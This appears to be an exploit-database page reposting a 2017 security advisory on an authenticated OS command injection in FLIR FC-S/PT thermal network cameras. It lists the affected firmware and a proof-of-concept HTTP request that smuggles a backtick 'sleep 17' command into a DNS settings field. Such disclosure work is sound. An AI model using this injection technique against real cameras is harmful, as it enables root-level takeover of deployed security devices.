Advertisement






FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection

CVE Category Price Severity
CVE-2020-25094 CWE-78 $15,000 Critical
Author Risk Exploitation Type Date
EzzElDin Ibrahim High Remote 2017-09-26
CPE
cpe:cpe:/a:flir_systems:flir_thermal_camera_fc-s_pt
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090207

Below is a copy:

FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection
FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection


Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
                  Software version: 10.0.2.43
                  Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
                  FC-Series S (FC-334-NTSC)
                  PT-Series (PT-334 200562)

Summary: Get the best image detail in challenging imaging environments with the
FLIR FC-Series S thermal network camera. The award-winning FC-Series S camera
sets the industry standard for high-quality thermal security cameras, ideal for
perimeter protection applications. The FC-Series S is capable of replacing multiple
visible cameras and any additional lighting and infrastructure needed to support
them.

Desc: FLIR FC-S/PT series suffer from an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary shell commands as the root user.


Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
           Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
           Nexus Server/2.5.29.0
           Nexus Server/2.5.14.0
           Nexus Server/2.5.13.0
           lighttpd/1.4.28
           PHP/5.4.7


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5437
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php


23.03.2017

--


PoC request (sleep 17):

POST /page/maintenance/lanSettings/dns HTTP/1.1
Host: TARGET
Content-Length: 64
Accept: */*
Origin: http://TARGET
X-Requested-With: XMLHttpRequest
User-Agent: Testingus/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/maintenance
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
Connection: close

dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.